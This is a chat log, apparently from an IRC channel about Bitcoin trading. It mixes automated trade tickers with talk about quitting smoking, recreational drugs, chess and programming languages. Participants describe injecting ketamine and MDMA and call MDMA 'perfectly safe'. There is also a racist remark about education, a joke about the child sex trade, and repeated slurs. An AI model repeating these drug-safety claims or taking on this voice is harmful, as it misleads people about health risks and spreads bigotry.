supplement" that doesn't include it. Oct 24 07:00:02 <nubbins`> well, no, but most people would choose not to snort a line of it, given the choice Oct 24 07:00:49 <nubbins`> my two-year quitting anniversary was last week Oct 24 07:01:39 <BingoBoingo> Congrats nubbins` if you mean tobacco. If you were talking powder though that isn't so big of a deal. Oct 24 07:01:47 <nubbins`> tobacco Oct 24 07:02:12 <nubbins`> i like things way too much to ever try coke Oct 24 07:03:02 <assbot> [HAVELOCK] [CFIG] 5 @ 0.1223 = 0.6115 BTC [-] Oct 24 07:05:23 <BingoBoingo> nubbins`: Coke is a relatively easy quit though. Really a take or leave it sort of thing. Tobacco is a bit more insidious though. On top of half your neurons containing nicotinic-cholinergic receptors there are a bunch of mono-amine reductase inhibitors in tobacco which are much less frequently mentioned. Oct 24 07:05:56 <mike_c> suck it mindreader Oct 24 07:05:58 <nubbins`> well, it's a much more innocent habit on the surface, too, which makes it seem like less of a problem Oct 24 07:05:58 <mike_c> http://imgur.com/dLVtvNb Oct 24 07:05:58 <ozbot> imgur: the simple image sharer Oct 24 07:06:05 <nubbins`> and if it's not a big problem, why quit? Oct 24 07:06:15 <mircea_popescu> this entire tobacco is addictive talk is hogwash. i've been smoking for about twenty years now, at the rate of about one pack a month Oct 24 07:06:36 <mircea_popescu> not bad mike Oct 24 07:07:22 <nubbins`> then why do i still get intense cravings for cigarettes when i see people smoking on tv? Oct 24 07:07:36 <mircea_popescu> hm Oct 24 07:07:40 <mike_c> physical addiction ends in.. 3 weeks i think Oct 24 07:07:45 <mike_c> after that it's psychological Oct 24 07:07:45 <BingoBoingo> mircea_popescu: Maybe this chemistry versus food thing continues across the Atlantic, and to things not entirely food. Or maybe I don't get enough pussy. Oct 24 07:07:51 <nubbins`> mike_c: +1 Oct 24 07:08:02 <mircea_popescu> nubbins` i have no fucking idea tbh. Oct 24 07:08:03 <nubbins`> 3 weeks and your body is nicotine-free Oct 24 07:08:08 <mike_c> i.e. your mind still remembers nicotine as a great way to relieve stress Oct 24 07:08:16 <nubbins`> mircea_popescu: because it's burned into my brain Oct 24 07:08:17 <mircea_popescu> what stress. Oct 24 07:08:26 <nubbins`> i'm still a smoker, and always will be Oct 24 07:08:30 <mircea_popescu> maybe that's it, i don't stress enough to addict. Oct 24 07:08:34 <VanCleef> the only to quit smoking is to be locked away on a island somewhere with a girl where you cant buy smokes and everytime u get a craving get a gobbie instead Oct 24 07:08:35 <nubbins`> i just haven't had a cigarette in two years Oct 24 07:08:45 <mike_c> that is interesting.. could be mp. Oct 24 07:08:45 <VanCleef> till the nicotine leaves your system Oct 24 07:09:04 <mike_c> nubbins`: agreed. Oct 24 07:09:57 <nubbins`> mircea_popescu: i did have fairly high stress levels during that period of my life Oct 24 07:10:06 <nubbins`> but i can't lay the blame fully on that Oct 24 07:10:08 <mircea_popescu> some of the girls smoke, for that matter. i sometimes join in over coffee, but i don't recall ever craving it Oct 24 07:10:33 <dub> kicking smoking is easy Oct 24 07:10:40 <dub> just dont be a bitch Oct 24 07:10:44 <nubbins`> dub, if you're ready to quit, it is Oct 24 07:10:48 <nubbins`> you just don't smoke Oct 24 07:10:50 <BingoBoingo> I'd have to say if I could choose which of the drugs I've tried to have an addiction to I'd probably want it to be Ketamine. That was fun. Coke was kind of fun, but bleh. Oct 24 07:10:51 <dub> yep Oct 24 07:10:53 <nubbins`> what's easier than not doing something? Oct 24 07:11:11 <BingoBoingo> nubbins`: Starting a fire. Oct 24 07:11:16 <nubbins`> hell, i'm not having a cigarette this very moment Oct 24 07:11:16 <mircea_popescu> ketamine ?! isn't that basically an anti allergic thing ? Oct 24 07:11:27 <nubbins`> ketamine is a dissociative Oct 24 07:11:27 <dub> no Oct 24 07:11:32 <nubbins`> they put dogs to sleep with it Oct 24 07:11:35 <nubbins`> :0 Oct 24 07:11:48 <dub> they use it for trauma anesthesia too Oct 24 07:11:56 <nubbins`> er yeah, that's what i meant Oct 24 07:12:03 <nubbins`> forgot that "sleep" is a euphemism in pet-world Oct 24 07:12:04 <dub> I've mainlined it recreationally, not a whole lot of fun Oct 24 07:12:06 <mircea_popescu> dub i could swear they used it as antihistamine here in the 90s Oct 24 07:12:16 <BingoBoingo> mircea_popescu: It is an anesthetic, but more than anything exotic it has a good feel. If I was picking an antihistamine to be addicted to I'd probably go with mirtazapine. Oct 24 07:12:24 <nubbins`> meh Oct 24 07:12:38 <nubbins`> i've had insane antihistamines Oct 24 07:12:42 <nubbins`> they just make you sleepy Oct 24 07:12:51 <nubbins`> had an injection once, slept for most of 4 days Oct 24 07:13:06 <BingoBoingo> nubbins`: They only make you sleepy until they take your further than sleepy. Oct 24 07:13:13 <nubbins`> heh! Oct 24 07:14:03 <BingoBoingo> Once they take you further than that... You have to start hedging vague memories of a past you with the word allegedly. Oct 24 07:14:13 <assbot> [HAVELOCK] [AM100] 1151 @ 0.0048572 = 5.5906 BTC [+] {7} Oct 24 07:14:51 <nubbins`> if i had a dollar for every "allegedly"... Oct 24 07:15:14 <assbot> [HAVELOCK] [AM100] 204 @ 0.0052 = 1.0608 BTC [+] {2} Oct 24 07:15:24 <mircea_popescu> BingoBoingo wait, that's the explanation of the bizarre written style some people employ filling any discussion of their past with "allegedly" ? they're pill poppers ? Oct 24 07:15:30 <nubbins`> hell, if i had a dollar for every time i achieved complete awareness Oct 24 07:15:45 <nubbins`> mircea_popescu: either that, or they plead not-guilty Oct 24 07:16:32 <BingoBoingo> mircea_popescu: No, sometimes they are drunks. Othertimes they are too paranoid to trust their counsel. Any of those three reasons though might have saved the fatso running Gox. Oct 24 07:17:04 <mircea_popescu> "i've allegedly signed some papers i've never read" Oct 24 07:17:08 <mircea_popescu> yeah, sounds grand Oct 24 07:18:21 <BingoBoingo> mircea_popescu: And that is why GPG is great. It forces the removal of "allegedly" or forgery. Oct 24 07:19:01 <BingoBoingo> mircea_popescu: Maybe you send some federal magistrates Cardanos as a promotion? Oct 24 07:19:06 <nubbins`> can you gpg sign your whereabouts on the evening of the 16th? Oct 24 07:19:18 <nubbins`> BingoBoingo: that's a lot of Cardanos ;) Oct 24 07:19:39 <mircea_popescu> BingoBoingo they'd probably think it's a bomb. Oct 24 07:19:50 <BingoBoingo> nubbins`: I just might be able to. I actually think I auth'd with gribble last Wednesday. Oct 24 07:20:09 <BingoBoingo> mircea_popescu: Maybe only make one or two bombs then. Oct 24 07:20:55 <asciilifeform> phun phact: one of my old workplaces, a military lab, had ads hanging in the lounges, offering decent $ (around a thousand if i recall) for being given ketamine. Oct 24 07:20:59 <mircea_popescu> how would you pick who to send them to then Oct 24 07:21:20 <asciilifeform> most of the 'take a phone #' tabs remained in place. very few takers. Oct 24 07:21:24 <BingoBoingo> mircea_popescu: After stage 2, 3, and 4 of your latest bounty. Oct 24 07:21:40 <dub> asciilifeform: so you worked with a bunch of drug users Oct 24 07:22:01 <BingoBoingo> SOunds more like testing dub Oct 24 07:22:06 <asciilifeform> dub: there were also ads for 'agree to be given malaria.' Oct 24 07:22:10 <mircea_popescu> asciilifeform can't be that hard to get ?! Oct 24 07:22:34 <asciilifeform> easy to get. they stuff an arm into a sort of chamber filled with 'anopheles.' Oct 24 07:22:41 <nubbins`> heh Oct 24 07:22:42 <dub> theres a pretty narrow band in whih ketamine is 'fun' a lot of users know this and avoid it Oct 24 07:23:02 <dub> for medical grade ketamine I would say its not enjoyable at all Oct 24 07:23:31 <mircea_popescu> asciilifeform i meant the ketamine Oct 24 07:23:32 <asciilifeform> afaik it (ketamine, not malaria) was being tried as a 'ptsd' cure. Oct 24 07:23:44 <mircea_popescu> o wait, they gave it to you Oct 24 07:23:45 <mircea_popescu> heh. Oct 24 07:24:09 <BingoBoingo> asciilifeform: Ketamine as well as Molly test rather well for that purpose in limited studies. Oct 24 07:24:40 <asciilifeform> BingoBoingo: i believe those were the 'limited studies.' Oct 24 07:25:20 <asciilifeform> nobody took the offer because, as i understand, grunts didn't want to burn through their paid leave. Oct 24 07:25:38 <asciilifeform> lying around in a lab, answering quizzes while being injected with strange. Oct 24 07:25:56 <dub> mdma is considered perfectly safe and quite useful for a number of things Oct 24 07:26:27 <dub> sexual dysfunction included Oct 24 07:26:33 <BingoBoingo> asciilifeform: Well, there have been some in North America too. It is a situation where differing definitions of recovery and diagnoses conflict. I've had a cousin who while in the service got an AIDs shot in an experiment and still has something resembling an immune system though, so... Oct 24 07:27:25 <assbot> [HAVELOCK] [AM100] 76 @ 0.00550001 = 0.418 BTC [-] {2} Oct 24 07:27:42 <dub> pure mdma in the vein is pretty interesting too Oct 24 07:31:09 <BingoBoingo> dub: Most MDMA isn't pure though. It actually gets less pure when powdered and refered to as "Molly" Oct 24 07:31:29 <assbot> [HAVELOCK] [AM100] 50 @ 0.00550001 = 0.275 BTC [-] Oct 24 07:34:49 <dub> yeah with all kinds of shit thrown in for extra bang (heroin is popular) Oct 24 07:35:42 <BingoBoingo> dub: Do you remember Darryl Strawberry? Oct 24 07:36:04 <dub> no but im !murican Oct 24 07:37:37 <BingoBoingo> dub: He was a ball player. He actually looks healthier now. Oct 24 07:39:09 <dub> sounds like an all american story, baller turned crackhead turned pastor Oct 24 07:40:01 <nubbins`> hmm, this new purple emulsion we bought has turned brown Oct 24 07:41:40 <assbot> [HAVELOCK] [CBTC] 6971 @ 0.00014753 = 1.0284 BTC [-] {5} Oct 24 07:42:01 <dub> purple drank? Oct 24 07:42:22 <nubbins`> nah, it's basically photosensitive glue Oct 24 07:42:24 <BingoBoingo> dub: More like baller turned crackhead, turned regular at the local hooters, but still. Oct 24 07:42:53 <mircea_popescu> a guy with a name like darryl strawberry should be involved in the child sex trade, not fucking drugs Oct 24 07:42:55 <nubbins`> never had it change color like this before Oct 24 07:43:04 <nubbins`> darryl strawberry was on the simpsons once Oct 24 07:43:20 <nubbins`> http://assets.sbnation.com/assets/869972/straw.jpg Oct 24 07:44:24 <mircea_popescu> list of bizarre sex articles on trilema someone may want to translate : http://trilema.com/2011/abuzul-si-fetele/ ; http://trilema.com/2011/moment-de-intimitate-n-baie/ ; http://trilema.com/2011/momentary-ebullution-of-intimacy/ Oct 24 07:53:33 <BingoBoingo> ChaangNoi: What is Cognitive going for lately? Oct 24 07:56:04 <BingoBoingo> mircea_popescu: When's the last time you were on TradeFortress's CoinChat? Oct 24 07:56:28 <mircea_popescu> i never was. Oct 24 07:58:35 <BingoBoingo> mircea_popescu: Ah, I though you said sometime you had stopped by to visit. Oct 24 07:58:57 <assbot> [HAVELOCK] [AM100] 50 @ 0.00550001 = 0.275 BTC [-] Oct 24 07:59:44 <mircea_popescu> quote it if possible Oct 24 08:02:06 <BingoBoingo> I'll search the logs, might be a while. Or maybe I'm trippin balls. Probably the latter. Oct 24 08:02:55 <nubbins`> maybe Oct 24 08:03:02 <nubbins`> has the room filled up with vibrations yet? Oct 24 08:03:07 <mircea_popescu> “In my study of communist societies, I came to the conclusion that the purpose of communist propaganda was not to persuade or convince, not to inform, but to humiliate; and therefore, the less it corresponded to reality the better. When people are forced to remain silent when they are being told the most obvious lies, or even worse when they are forced to repeat the lies themselves, they lose once and for all their s Oct 24 08:03:07 <mircea_popescu> ense of probity. To assent to obvious lies is…in some small way to become evil oneself. One’s standing to resist anything is thus eroded, and even destroyed. A society of emasculated liars is easy to control. I think if you examine political correctness, it has the same effect and is intended to.” Oct 24 08:03:55 <nubbins`> huh. Oct 24 08:04:23 <mircea_popescu> quote of the day Oct 24 08:06:04 <assbot> [HAVELOCK] [AM100] 215 @ 0.0055 = 1.1825 BTC [-] Oct 24 08:06:16 <mircea_popescu> im a one chan type of guy. Oct 24 08:07:06 <assbot> [HAVELOCK] [AM1] 2 @ 0.58999999 = 1.18 BTC [+] Oct 24 08:07:41 <BingoBoingo> mircea_popescu: I understand. I need to blog moar. Oct 24 08:10:08 <assbot> [HAVELOCK] [AM100] 1249 @ 0.0055 = 6.8695 BTC [-] {2} Oct 24 08:11:46 <nubbins`> all those guys who bought AM shares at 4+ must be fitting themselves for ropes right now Oct 24 08:13:11 <assbot> [MPEX] [S.MPOE] 5850 @ 0.00083331 = 4.8749 BTC [-] Oct 24 08:14:12 <assbot> [HAVELOCK] [NEOBEE] 99 @ 0.00209 = 0.2069 BTC [+] Oct 24 08:15:19 <BingoBoingo> nubbins`: How are the ones who sold at 4+ doing though... Sometimes that lack of a proper market helps enrich the tards. Oct 24 08:16:14 <assbot> [HAVELOCK] [AM100] 62 @ 0.0055 = 0.341 BTC [-] Oct 24 08:22:26 <BingoBoingo> Anyone in this channel play chess at all? Oct 24 08:23:02 <nubbins`> i play occasionally. not very good Oct 24 08:24:06 <nubbins`> used to play via SMS with a friend who moved away. two boards + algebraic notation ;) Oct 24 08:24:21 <BingoBoingo> nubbins`: Neither am I. ~950 Elo rated if anyone cares. Oct 24 08:24:47 <nubbins`> i've printed chessboards, too Oct 24 08:24:50 <nubbins`> fun stuff Oct 24 08:25:17 <nubbins`> regulation-size boards are huge. they make for good wall art Oct 24 08:27:07 <BingoBoingo> Yeah they do. Finding decent glue to hold the pieces is another challenge though. Oct 24 08:28:07 <nubbins`> my dad's big into woodworking, he has an insane glue collection Oct 24 08:28:17 <BingoBoingo> nubbins`: Prefer white or black? Oct 24 08:28:32 <nubbins`> i've just been printing flat ones on cotton rag so far, but i'm hoping to try printing directly to wood soon Oct 24 08:28:42 <nubbins`> i prefer white Oct 24 08:29:00 <BingoBoingo> nubbins`: PM me if you want to start a game. Oct 24 08:29:28 <nubbins`> will do, pretty hectic these days but i'm sure i can find somewhere to set a board up Oct 24 08:29:29 <BingoBoingo> (unless assbot is plugged into Rybka) Oct 24 08:29:33 <nubbins`> ;;goxlag Oct 24 08:29:35 <gribble> MtGox lag is 1.011352 seconds. During this time, light travels 0.00202673808434 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Oct 24 08:29:38 <BingoBoingo> ;; Oct 24 08:30:25 <nubbins`> like six minutes ago? Oct 24 08:30:40 <nubbins`> gribble: MtGox lag is 580874.405675 seconds. During this time, light travels 1164.06580518 AU. You could have sent a bitcoin from the Sun to heliopause (out of the solar system!) (100 AU). Oct 24 08:30:45 <nubbins`> actually, 4 minutes ago Oct 24 08:30:54 <nubbins`> guess they're having problems :p Oct 24 08:31:22 <BingoBoingo> I was thinking April. I didn't realize they still pretended they had volume. Oct 24 08:31:44 <mod6> yeah, back this spring it went down for quite a long time. Oct 24 08:36:01 <mod6> ;;bc,stats Oct 24 08:36:04 <gribble> Current Blocks: 265682 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 429 blocks | Next Difficulty In About: 1 day, 20 hours, 45 minutes, and 54 seconds | Next Difficulty Estimate: 382512508.366 | Estimated Percent Change: 42.87182 Oct 24 08:36:36 <nubbins`> 42! Oct 24 08:48:46 <assbot> [HAVELOCK] [HIM] 6 @ 0.06999999 = 0.42 BTC [+] Oct 24 08:49:47 <assbot> [HAVELOCK] [B] [XBOND] 475 @ 0.00114999 = 0.5462 BTC [+] Oct 24 08:49:49 <mod6> huh, just saw this site for the first time: http://www.digitalattackmap.com/ Oct 24 08:54:52 <assbot> [HAVELOCK] [HIM] 19 @ 0.06999999 = 1.33 BTC [+] Oct 24 09:04:01 <assbot> [HAVELOCK] [AM100] 56 @ 0.0055 = 0.308 BTC [-] Oct 24 09:23:20 <assbot> [HAVELOCK] [AM1] 14 @ 0.56114286 = 7.856 BTC [-] {4} Oct 24 09:25:50 <mircea_popescu> so who here has heard the term "neoreactionary" before ? Oct 24 09:28:02 <BingoBoingo> mircea_popescu: Wait a bit, nubbins` needs to learn this chess thing Oct 24 09:32:32 <BingoBoingo> mircea_popescu: Isn't neoreactionary an #Urbit thing? Oct 24 09:32:43 <mircea_popescu> i suppose it may be. Oct 24 09:33:00 <mircea_popescu> http://trilema.com/2013/in-which-i-discuss-things-i-have-no-idea-about/ to trace where i stumbled on it Oct 24 09:33:01 <ozbot> In which I discuss things I have no idea about pe Trilema - Un blog de Mircea Popescu. Oct 24 09:35:25 <BingoBoingo> I'll get to reading once the kingdom of nubbins` falls Oct 24 09:36:52 <nubbins`> looks pretty grim Oct 24 09:39:26 <mircea_popescu> by the way, didja know fiat-iq is also inflation prone ? Oct 24 09:39:28 <BingoBoingo> Today might be the day the Ras Tafari beats the I'talians http://i.imgur.com/WnROeUp.jpg Oct 24 09:39:35 <mircea_popescu> (in the sense the 100 iq average is periodically resampled) Oct 24 09:41:43 <BingoBoingo> I have a feeling raw IQ like mining probably has fundamental problems in that the people anticipating profits don't know how to wipe. Oct 24 09:42:33 <mircea_popescu> still, probably the one applciation of asciilifeform's slavecoin Oct 24 09:43:45 <nubbins`> BingoBoingo: my board's fancier Oct 24 09:43:46 <nubbins`> http://i.imgur.com/MedBs7f.png Oct 24 09:44:29 <BingoBoingo> nubbins`: Your board also lacks things to take on c5 Oct 24 09:45:17 <mircea_popescu> bingo has won Oct 24 09:45:38 <nubbins`> heh Oct 24 09:45:39 <nubbins`> yep Oct 24 09:45:44 <mircea_popescu> that F pawn is a queen pretty much Oct 24 09:46:49 <BingoBoingo> mircea_popescu: Well the f or the h pawn depending on how he decides to struggle. Preferably the f though to avoid a forced stalemate. Oct 24 09:47:21 <mircea_popescu> there's nothing he can do to prevent the F Oct 24 09:47:32 <mircea_popescu> if he moves before it you push the h/e pawns into him Oct 24 09:47:44 <assbot> [HAVELOCK] [AM100] 29 @ 0.00555 = 0.161 BTC [+] Oct 24 09:47:54 <mircea_popescu> preferably g first as it needs a move anyway Oct 24 09:47:59 <BingoBoingo> Now the f-pawn is inevitable. Oct 24 09:49:56 <BingoBoingo> http://imgur.com/2J0i4DU Oct 24 09:49:56 <ozbot> imgur: the simple image sharer Oct 24 09:54:22 <BingoBoingo> mircea_popescu: It is over, so I'll read nao Oct 24 09:55:11 <nubbins`> https://www.dropbox.com/s/hfu11uljk3kjbcs/chess.svg if anyone wants a board i made in .svg format Oct 24 09:56:02 <nubbins`> on that note, it's 4:30am. nite Oct 24 09:56:53 <assbot> [MPEX] [S.MPOE] 12800 @ 0.00083451 = 10.6817 BTC [+] {2} Oct 24 10:00:57 <assbot> [HAVELOCK] [VTX] 1 @ 0.34989999 BTC [+] Oct 24 10:01:58 <assbot> [HAVELOCK] [VTX] 1 @ 0.34989999 BTC [+] Oct 24 10:01:59 <assbot> [MPEX] [S.MPOE] 3900 @ 0.00083474 = 3.2555 BTC [+] Oct 24 10:04:13 <taub> i want it to drop hard again Oct 24 10:04:16 <taub> not sure it will Oct 24 10:05:33 <BingoBoingo> taub: How long wou willing to wait? Oct 24 10:06:13 <taub> cant say Oct 24 10:06:37 <taub> if we go back up above this high (204 on bitstamp) its not good :D Oct 24 10:07:00 <taub> basically means "yea there was a huge selloff, no big deal got absorbed, on we go" Oct 24 10:08:03 <taub> short term 1-2 days i'd say bearish to rangeish Oct 24 10:08:04 <BingoBoingo> I think the new idiots are going to take us to a new high Oct 24 10:08:23 <taub> gtg Oct 24 10:25:22 <assbot> [MPEX] [S.MPOE] 11219 @ 0.00083646 = 9.3842 BTC [+] {3} Oct 24 10:37:33 <assbot> [MPEX] [S.MPOE] 21735 @ 0.00083233 = 18.0907 BTC [-] {4} Oct 24 10:57:54 <assbot> [HAVELOCK] [AM1] 1 @ 0.561 BTC [-] Oct 24 10:57:55 <assbot> [HAVELOCK] [NEOBEE] 150 @ 0.00224993 = 0.3375 BTC [+] Oct 24 10:58:54 <assbot> [HAVELOCK] [B] [XBOND] 242 @ 0.00114998 = 0.2783 BTC [-] Oct 24 11:01:24 <BingoBoingo> Also, this BitBet should probably resolve. I though it would have taken longer... http://bitbet.us/bet/545/no-such-labs-higher-market-cap-than-s-mg/#c1660 Apperently S.NSA rocks the marketing though. Oct 24 11:18:00 <mircea_popescu> BingoBoingo how do you figure ? Oct 24 11:18:31 <mircea_popescu> $ticker m s.mg Oct 24 11:18:39 <mircea_popescu> $vwap m s.mg Oct 24 11:18:40 <mpexbot> mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Oct 24 11:18:42 <mircea_popescu> $vwap s.mg Oct 24 11:18:44 <mpexbot> mircea_popescu: S.MG 1 day: no data 7 day: average: 0.00016401 high: 0.00018 low: 0.00015 volume: 27127 btc: 4.44903 30 day: average: 0.00017041 high: 0.00018001 low: 0.00015 volume: 45227 btc: 7.70704 Oct 24 11:18:46 <BingoBoingo> mircea_popescu: The BitBet? I just mathed the last prices into market caps Oct 24 11:19:12 <BingoBoingo> From the MPEx.co site. Oct 24 11:19:14 <assbot> [MPEX] [S.MPOE] 9400 @ 0.00082835 = 7.7865 BTC [-] {2} Oct 24 11:19:28 <BingoBoingo> Then again websites are notoriously unreliable. Oct 24 11:19:52 <mircea_popescu> ;;calc 0.00017041 * 88096605 Oct 24 11:19:52 <gribble> 15012.542458 Oct 24 11:19:58 <mircea_popescu> $vwap s.nsa Oct 24 11:19:59 <mpexbot> mircea_popescu: S.NSA 1 day: average: 0.000235 high: 0.000235 low: 0.000235 volume: 5000 btc: 1.175 7 day: average: 0.00010108 high: 0.00028 low: 0.0001 volume: 726000 btc: 73.383 30 day: average: 0.00010017 high: 0.00028 low: 0.0001 volume: 4743075 btc: 475.095695 Oct 24 11:20:52 <mircea_popescu> ;;calc 0.00010017*4737075 Oct 24 11:20:52 <gribble> 474.51280275 Oct 24 11:21:12 <mircea_popescu> ;;calc 15012.542458 / 474.51280275 * 100 Oct 24 11:21:13 <gribble> 3163.78027547 Oct 24 11:21:26 <BingoBoingo> I might also be a bit drunk to math, but... I was under the impression S.NSA and S.MG were both 100 million shares and S.BBET was 10. I may have mathed or contracted wrong though. Oct 24 11:21:26 <mircea_popescu> s.mg is 3163.x% s.nsa Oct 24 11:21:44 <BingoBoingo> Ah. Oct 24 11:21:50 <mircea_popescu> no. s.nsa sold ~4mn, which became the total authorised float. s.mg sold ~88mn, which became the total authorised float Oct 24 11:22:41 <BingoBoingo> I see. This is why I bet rather than invest. Oct 24 11:24:04 <BingoBoingo> I'm still inclined to believe a production Cardano will ship before Euloria hits production. Oct 24 11:26:10 <BingoBoingo> ;; Oct 24 11:26:21 <assbot> [HAVELOCK] [AM1] 1 @ 0.5301 BTC [-] Oct 24 11:28:06 <mircea_popescu> possibly. entirely different items. Oct 24 11:28:24 <mircea_popescu> at least in their lifecycle. eulora for that matter is already available. Oct 24 11:29:37 <BingoBoingo> mircea_popescu: A form of Eulora is available. I wonder how many people might want to buy 5+ Demigod or Lich characters in Eulora versus people who might see a need for as many Cardanos. Oct 24 11:30:01 <mircea_popescu> i doubt there will be five liches active at any one time in eulora. Oct 24 11:30:12 <mircea_popescu> maybe with a population surpassing wow. Oct 24 11:31:47 <BingoBoingo> I mean RSA is old, 70's math and still stands with proper key pairs. It seems the kind of asymmetric encryption still. I mean how did Rand corporation grow so big? Oct 24 11:31:59 <BingoBoingo> *king Oct 24 11:32:45 <mircea_popescu> in general in computer science people split into two groups, ie, the retards and the competent, by the code they use. Oct 24 11:32:55 <mircea_popescu> retards imagine "all new code" is better, as if code rusted. Oct 24 11:33:08 <mircea_popescu> competent people still use the 1950s C and the 1970s C compiler Oct 24 11:33:28 <assbot> [MPEX] [S.MPOE] 7977 @ 0.00082834 = 6.6077 BTC [-] {2} Oct 24 11:34:10 <BingoBoingo> mircea_popescu: Depends on what you mean by code. Language would probably be a dubious distinction. The way they organize their code is probably the point. Oct 24 11:34:33 <BingoBoingo> Who cares how many person hours Python saves if the code runs 100x slower. Oct 24 11:35:15 <mircea_popescu> no, language is a fine distinction. the practical choice one has today is still the same one had in 1960 : eiher something algol-like, something haskel-like, something lisp-like or perhaps an stack insanity a la asm. Oct 24 11:35:38 <mircea_popescu> c has been repackaged 12+ times in the intervening 50 years to appeal to retarded teenagers Oct 24 11:35:49 <mircea_popescu> im not sure what's fashionable now that java and ruby are dead, but anyway. Oct 24 11:36:16 <mircea_popescu> lisp started doing the same thing strictly out of frustration, like the geek that's now wearing a new jockstrap each week maybe he gets to be as popular with the young ditzes as the jock Oct 24 11:37:22 <BingoBoingo> Yeah. I've only ever dealt with C++, Fortran, and Python in that order. C++ I remember as fast, fortran was verbose, and I never wrote anything important enough to feel slow though other people's .py programs have. Oct 24 11:37:31 <BingoBoingo> Do geeks wear jockstraps nao? Oct 24 11:38:56 <BingoBoingo> I mean the armory wallet is a python program where going through the interpreter on Linux it is unbearably slow though when compiled for Windows it was fast. Oct 24 11:39:17 <mircea_popescu> well poorly optimised compilers are really a distantly related subdiscussion Oct 24 11:39:50 <BingoBoingo> Of course. As are people trying to substitute interpreters for compilers a la the Lisp machine. Oct 24 11:41:38 <BingoBoingo> I think in computing there might be some almost necessary balance between complete control and optimal speed. Oct 24 11:43:29 <mircea_popescu> this is untrue. writing directly in assembler is both the most control and the most speed. Oct 24 11:44:02 <mircea_popescu> the balance is between (laziness, ignorance and their offspring) in the human operator on one end and (sugar spice and everything nice) in the machine on the other. Oct 24 11:44:03 <jurov> morning Oct 24 11:44:10 <mircea_popescu> heya. Oct 24 11:45:29 <BingoBoingo> mircea_popescu: Probably, but it is quite a leap creating code that can be organized in assembly for the TI-89 and assembler for a modern x86 chip. I imagine the leap to the assembler OCL compile to would be still harder to organize. Oct 24 11:45:58 <mircea_popescu> it's a homologuous problem to beating the machine in the numbers game earlier. Oct 24 11:46:02 <mircea_popescu> you need a big head to do it. Oct 24 11:47:42 <assbot> [HAVELOCK] [AM100] 252 @ 0.0055 = 1.386 BTC [-] Oct 24 11:48:11 <BingoBoingo> mircea_popescu: At some point even a big head faile unless is surrenders to the aspersorzing. The TI-89 and the 0x0 Macs were the last machines I remember assembler and BASIC flavors being comparably organizable, though my experience in the matter is limited. Oct 24 11:49:45 <mircea_popescu> this is basically institutional laziness created to not throw the curve for black people. Oct 24 11:50:04 <mircea_popescu> in point of fact asm is quite transparent and quite transparently used by actually competent programmers, such as malware creators. Oct 24 11:50:11 <mircea_popescu> even for and on modern systems Oct 24 11:50:31 <mircea_popescu> that this isn't required of sophomore it students in the west speaks more of the poor quality of it education in the west. Oct 24 11:52:26 <BingoBoingo> Once I finally got internet access programming the computers fell into the backseat and finding pr0n on the computers moved to the fore. A failure of education may be one factor. There is probably also a failure of inflicting hunger as well though. Oct 24 11:54:33 <BingoBoingo> I've always counted on malware wuthors being necessarily more sophisticated since they are more likely to have primal motivations like hunder fueling their master of the craft. Oct 24 11:55:02 <mircea_popescu> see, im not sure why hunger and education'd be separate issues. Oct 24 11:55:08 <BingoBoingo> Ah, I butchered the typing on that sentence... Oct 24 11:55:59 <mircea_popescu> "either write a chess program in asm or starve for one month" seems a perfectly healthy proposition for any 20 year old to confront. Oct 24 11:57:02 <BingoBoingo> mircea_popescu: They probably ought not be so separated, but when a 'Murican school feeds all of the students like the football team everyone gets fat and no one really wants for anything. Having heavy a fat offensive line undermines the school's educational mission. Oct 24 11:57:44 <mircea_popescu> well... it's easier, and more comfortable, and always easier to find cheap waitresses than cheap mistresses, so... Oct 24 11:58:11 <BingoBoingo> Of course. Oct 24 12:03:05 <mircea_popescu> it's funny, they go to all this trouble to make school as much like a prison as possible, but then fail to take advantage of any of the implicit benefits. Oct 24 12:08:18 <Vexual> the comparative success of peeps at the pointy ends of a bell curve isn't realteable to the hardship of the masses Oct 24 12:09:29 <BingoBoingo> mircea_popescu: I took a seminar on the Kritik der reinen Vernunft where after covering the transcendental aesthetic and analytic the professor just stopped. The transendental dialectic, pure reason, and the doctrine of method remained. In a graduate seminar where physical hunger ought be expected of the students. Thus I stopped taking academic philosophy seriously as covered in the program. Oct 24 12:10:07 <mircea_popescu> i don't know americans ever had the opportunity to listen to philosophy lectures in their country. Oct 24 12:10:36 <mircea_popescu> maybe if some actual philosopher ever visited and felt inclined to talk to the hordes, which seems improbable. Oct 24 12:10:59 <mircea_popescu> Vexual what's that mean ? Oct 24 12:13:11 <BingoBoingo> mircea_popescu: There was once. This fellow William James at a point finally overcame his neuroses and condensed his principles of psychology into Psychology a Briefer course. Then his own dementia and this Dewey asshole had to undo his good work. Oct 24 12:14:12 <mircea_popescu> well ok, but psychology is not philosophy. and for that matter, really difficult to argue it into much more than a fashionable lady passtime. Oct 24 12:14:42 <Vexual> you could throttle every internet user today to 300 bps and give them a book on asm.. one guy would make the porn come fast Oct 24 12:15:57 <mircea_popescu> perhaps. how would this constitute schooling ? Oct 24 12:16:07 <Vexual> the only reason he did was because he could Oct 24 12:16:14 <mircea_popescu> schooling is all about putting people in controlled environment designed for their changing. Oct 24 12:16:16 <Vexual> thats my point Oct 24 12:16:37 <Vexual> who do you want to school? Oct 24 12:16:52 <mircea_popescu> hardly a point. this seems the three year old's expectation that his mother will feed him because she can. Oct 24 12:17:01 <BingoBoingo> mircea_popescu: Well, it was the age before you could deform a turtle into a peanut. Before and greater than James there was this Charles Pierce fellow, but he ate garbage even though in set theory papers are still now not uncommonly found to have proofs he offered earlier. Logic isn't quite philosophy though either. Oct 24 12:17:14 <mircea_popescu> and i don't want to school anyone, there's about 10mn people pretending they are schooling a hundred million kids in the us. Oct 24 12:17:40 <Vexual> that one guy isnt trying to school anyone Oct 24 12:17:44 <BingoBoingo> I will confess John Dewey ruined 'Murica's chance of having a philosophical legacy. Oct 24 12:17:50 <mircea_popescu> BingoBoingo the list is longer than pierce, who is imo respectable, but exactly : logic is logic, and "utilitarianism" isn't much philosophy. Oct 24 12:18:29 <Vexual> if one was to create a programming language, then the idea is to school people Oct 24 12:18:44 <mircea_popescu> and i don't think dewey ruined anything. i think dewey just "cut through the cuts that were there" as the old azn story goes. Oct 24 12:19:16 <mircea_popescu> Vexual the idea to school people comes from a desire to have them powerful and idnependent citizens, rather than worthless dependent subjects. Oct 24 12:20:15 <assbot> [HAVELOCK] [AM100] 500 @ 0.0055 = 2.75 BTC [-] Oct 24 